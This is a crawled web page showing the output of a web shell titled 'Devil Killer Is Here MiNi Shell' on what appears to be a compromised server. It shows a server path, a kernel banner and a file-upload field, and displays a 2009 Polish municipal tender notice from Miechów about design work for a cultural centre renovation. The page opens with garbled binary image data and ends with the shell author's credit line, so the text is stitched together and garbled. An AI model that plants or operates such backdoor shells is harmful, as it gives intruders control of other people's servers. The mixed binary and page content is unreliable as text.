JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090318/51655-N-2009.html

<p class="kh_header"><b>Miechów: Opracowanie dokumentacji projektowo - kosztorysowej  wraz z uzyskaniem prawomocnej decyzji pozwolenia na budowę do zadania pn. Remont obiektu infrastruktury kulturalnej budynku Miechowskiego Domu Kultury w Miechowie przy ul. Racławickiej 10 wraz z amfiteatrem</b><br>
<b>Numer ogłoszenia: 51655 - 2009; data zamieszczenia: 18.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy i Miasta w Miechowie , ul. Sienkiewicza 25, 32-200 Miechów, woj. małopolskie, tel. 041 3830040 w. 19, faks 041 3832378.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miechow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej  wraz z uzyskaniem prawomocnej decyzji pozwolenia na budowę do zadania pn. Remont obiektu infrastruktury kulturalnej budynku Miechowskiego Domu Kultury w Miechowie przy ul. Racławickiej 10 wraz z amfiteatrem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Zakres robót obejmuje:
1. CZĘŚĆ KONSTRUKCYJNO - ARCHITEKTONICZNA:
- projekt remontu pomieszczeń budynku
W opracowaniu należy uwzględnić zakres robót w celu dostosowania do warunków  spełniających kryterium jako trudno zapalne ( dotyczy podłóg i ścian )
Projekt winien również obejmować wymianę stolarki drzwiowej oraz dostosowanie obiektu dla osób niepełnosprawnych 
- projekt wymiany foteli w sali kinowej spełniające kryterium jako trudno zapalne.
- projekt remontu balkonów wewnętrznych
- projekt remontu stropu nad widownią
- projekt remontu schodów zewnętrznych
- projekt remontu amfiteatru ( należy również  uwzględnić wykonanie zadaszenia nad sceną )

2. CZĘŚĆ INSTALACYJNA:
- projekt uwzględniający rozebranie istniejącej instalacji wodno-kanalizacyjnej wraz 
z projektem kompleksowym nowej instalacji zaprojektować podgrzewanie ciepłej wody użytkowej
-  projekt wentylacji obiektu 
-  projekt wentylacji i klimatyzacji sceny i widowni
- projekt uwzględniający rozebranie instalacji centralnego ogrzewania wraz z demontażem urządzeń w kotłowni
-  projekt instalacji elektrycznej w zakresie wynikającym z pozostałych branż
-  projekt wewnętrznego systemu grzewczego wraz z kotłownią
-  projekt instalacji gazowej wraz z przyłączem 

3. PROJEKT ARANŻACJI SALI WIDOWISKOWEJ (SCENY) W TYM:
- projekt technologii sceny i zaplecza scenicznego,
- projekt nagłośnienia sali widowiskowej,
- projekt oświetlenia sali widowiskowej i sceny,
- projekt technologiczny sterowania oświetleniem sceny, nagłośnieniem, 
- projekt technologiczny pomieszczenia projekcyjnego kina
4. OPRACOWANIE MAPY DO CELÓW PROJEKTOWYCH

5. Powyższą dokumentację projektową należy wykonać w następującej  ilości egzemplarzy:
1.wykonanie projektów budowlano - wykonawczych oddzielnie dla każdej z branż, uwzględniających obowiązujące normy i przepisy wraz z niezbędnymi uzgodnieniami umożliwiającymi uzyskanie pozwolenia na budowę i decyzję ULI CP oraz decyzję DOUŚ, w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez wykonawcę i realizację robót budowlanych, opracowanych zgodnie z przepisami Prawa budowlanego spełniających wymagania Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2003r. Nr 120 poz. 1133) i przepisów wykonawczych oraz w § 5 Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych i wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. nr 202 poz. 2072 
z późniejszymi zmianami) - w ilości 4 egz.
2.wykonanie specyfikacji technicznej wykonania i odbioru robót budowlanych dla każdej z branż oddzielnie, przez którą należy rozumieć opracowania zawierające 
w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu 
i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. nr 202 poz. 2072 z późniejszymi zmianami) - w ilości 2 egz.
3.wykonanie przedmiarów robót dla każdej z branż oddzielnie, przez które należy rozumieć opracowania zawierające zestawienie przewidywanych do wykonania robót 
w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, 
z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych 
oraz wskazaniem podstaw do ustalania cen jednostkowych robót lub jednostkowych nakładów rzeczowych. Przedmiary muszą uwzględniać wymagania określone 
w § od 6 do 10 Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. 
w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych i wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. nr 202 poz. 2072 z późniejszymi zmianami) - w ilości 2 egz.
4.wykonanie kosztorysu inwestorskiego dla każdej z branż zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych 
w programie funkcjonalno-użytkowym (Dz. U. Nr 130 poz. 1389 z 2004r.) wydrukowanych w opcji kalkulacji uproszczonej z wyszczególnieniem cen jednostkowych dla każdej pozycji kosztorysowej - w ilości 2 egz.
5.wykonanie kosztorysów ofertowych ślepych dla każdej z branż - w ilości 2 egz.
6.sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ) ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianej w planie bezpieczeństwa i ochrony zdrowia - w ilości 2 egz. 
7.uzyskanie wszystkich niezbędnych uzgodnień i opinii, złożenie wniosku o decyzję ULI CP, wniosku o uzyskanie pozwolenia na budowę i uzyskanie prawomocnych decyzji oraz wniosku i uzyskanie decyzji DOUŚ.

II. Całość dokumentacji projektowej j.w. należy sporządzić również w wersji elektronicznej (PDF) i przekazać zamawiającemu na nośniku (CD)

III. Projekt powinien zostać opracowany z należytą starannością, zgodnie ze współczesną wiedzą techniczną i technologiczną, jak również z zachowaniem obowiązujących przepisów, norm i warunków technicznych. Wykonawca oświadcza, że zapoznał się dokładnie 
z warunkami lokalnymi na których będą realizowane prace i nie wnosi uwag..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Należy wnieść wadium w wysokości: 4 000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia może się ubiegać Wykonawca który:
1)posiada niezbędną wiedzę i doświadczenie tj. wykonał w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 usługę odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączyć dokumenty potwierdzające, że usługa ta została wykonana należycie.
2)dysponuje lub będzie dysponował osobami posiadającymi uprawnienia w zakresie projektowania w specjalności: konstrukcyjno - budowlanej, architektonicznej; instalacyjnej w zakresie instalacji i urządzeń elektrycznych; instalacyjnej 
w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, sanitarnych, gazowych, wpisanymi na listę członków właściwej izby samorządu zawodowego,
3)znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiada polisę, a w przypadku jej braku inny dokumen potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 100 000,00 zł
4)spełnia pozostałe warunki, o których mowa w art. 22 ust. 1 ustawy, w tym nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy.

Ocena spełniania przez Wykonawcę warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą (spełnia - nie spełnia) na podstawie oświadczenia i dokumentów złożonych przez Wykonawcę, określonych w części V SIWZ. Dokumenty powinny potwierdzać, że Wykonawca spełnia warunki określone w części IV SIWZ, przy czym:
1)ocena spełniania warunku, o którym mowa w części IV pkt 1 SIWZ będzie dokonana na podstawie dokumentów, o których mowa w części V pkt 6 i 7 SIWZ - z wykazu, 
o którym mowa w części V pkt 6 SIWZ (Załącznik 5 do SIWZ), powinno wynikać, że Wykonawca wykonał w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 usługę odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączyć dokumenty potwierdzające, że usługa ta została wykonana należycie.; dokumenty, o których mowa w części V pkt 7 SIWZ, powinny potwierdzać, że co najmniej 1 usługa zawarta w wykazie została wykonana należycie,
2)ocena spełniania warunku, o którym mowa w części IV pkt 2 SIWZ będzie dokonana:
w przypadku dysponowania osobami przez Wykonawcę będzie dokonana na podstawie dokumentów, o których mowa w części V pkt 3 i 5 SIWZ - z wykazu, 
o którym mowa w części V pkt 3 SIWZ (Załącznik 4 do SIWZ) powinno wynikać, że w specjalnościach wymienionych w części IV pkt 2 SIWZ, Wykonawca dysponuje osobami posiadającymi uprawnienia w zakresie projektowania w specjalności: konstrukcyjno - budowlanej, architektonicznej, instalacyjnej w zakresie instalacji 
i urządzeń elektrycznych; instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, sanitarnych, gazowych; dokumenty, o których mowa w części V pkt 5 SIWZ, powinny potwierdzać, że osoby wykazane w wykazie posiadają uprawnienia w zakresie projektowania w specjalności: konstrukcyjno - budowlanej, architektonicznej, instalacyjnej w zakresie instalacji i urządzeń elektrycznych; instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, sanitarnych, gazowych;
w przypadku kiedy Wykonawca będzie dysponował osobami, będzie dokonana na podstawie dokumentów, o których mowa w części V pkt 3, 4 i 5 SIWZ - z wykazu oraz oświadczenia, o którym mowa w części V pkt 3 i 4 SIWZ (Załącznik 4 do SIWZ) powinno wynikać, że w specjalności wymienionej w części IV pkt 2 SIWZ, Wykonawca będzie dysponował osobami posiadającymi uprawnienia w zakresie projektowania w specjalności: konstrukcyjno - budowlanej, architektonicznej, instalacyjnej w zakresie instalacji i urządzeń elektrycznych; instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, sanitarnych, gazowych; dokument, 
o którym mowa w części V pkt 5 SIWZ, powinien potwierdzać, że osoby wykazane w wykazie posiadają uprawnienia w zakresie projektowania w specjalności: konstrukcyjno - budowlanej, architektonicznej, instalacyjnej w zakresie instalacji 
i urządzeń elektrycznych; instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, sanitarnych, gazowych;
3)ocena spełniania warunku, o którym mowa w części IV pkt 3 SIWZ będzie dokonana na podstawie dokumentów, o których mowa w części V pkt 9 SIWZ, z których powinno wynikać że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 100 000,00 zł
4)ocena spełnienia pozostałych warunków, o których mowa w części IV pkt 4 SIWZ, będzie dokonana na podstawie dokumentów, o których mowa w części V pkt 2 i 8 SIWZ, oraz oświadczenia, o którym mowa w części V pkt 1 SIWZ (Załącznik 2 do SIWZ).
Zamawiający przyjmie, na podstawie złożonego przez Wykonawcę oświadczenia (Załącznik 2 do SIWZ), że Wykonawca spełnia pozostałe warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca powinien złożyć następujące oświadczenia i dokumenty:
1)oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (Załącznik 2 do SIWZ),
2)aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert,
3)wykaz zawierający osoby, którymi Wykonawca dysponuje lub będzie dysponował, a które będą wykonywać zamówienie, posiadające uprawnienia w zakresie projektowania 
w specjalności: konstrukcyjno - budowlanej, architektonicznej; instalacyjnej w zakresie instalacji i urządzeń elektrycznych; instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, sanitarnych, gazowych, o których mowa w części IV pkt 2 SIWZ (Załącznik 4 do SIWZ),
4)pisemne zobowiązania innych podmiotów do udostępnienia osoby posiadającej uprawnienia w zakresie projektowania w specjalności: konstrukcyjno - budowlanej, architektonicznej; instalacyjnej w zakresie instalacji i urządzeń elektrycznych; instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, sanitarnych, gazowych, o których mowa w części IV pkt 2 SIWZ, jeżeli w wykazie, 
o którym mowa w pkt 3, Wykonawca wskazał osoby, którymi będzie dysponował, 
5)dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, wykazane 
w wykazie, o którym mowa w pkt 3, posiadają uprawnienia w zakresie projektowania 
w specjalności: konstrukcyjno - budowlanej, architektonicznej; instalacyjnej w zakresie instalacji i urządzeń elektrycznych; instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, sanitarnych, gazowych, o których mowa w części IV pkt 2 SIWZ,
6)wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie usług, o których mowa w części IV pkt 1 SIWZ (Załącznik 5 do SIWZ)  - wykaz powinien zawierać co najmniej 1 usługę odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców,  
7)dokumenty (referencje, listy referencyjne lub dokumenty o podobnym charakterze) potwierdzające, że co najmniej 1 usługa zawarta w wykazie, o którym mowa w pkt 6, została wykonana należycie,
8)aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
9)polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 100 000,00 zł.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.miechow.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta w Miechowie
ul. Sienkiewicza 25
32-200 Miechów
pok. 221.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2009 godzina 11:00, miejsce: Urząd Gminy i Miasta w Miechowie
ul. Sienkiewicza 25
32-200 Miechów
sekretariat pok. 155.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com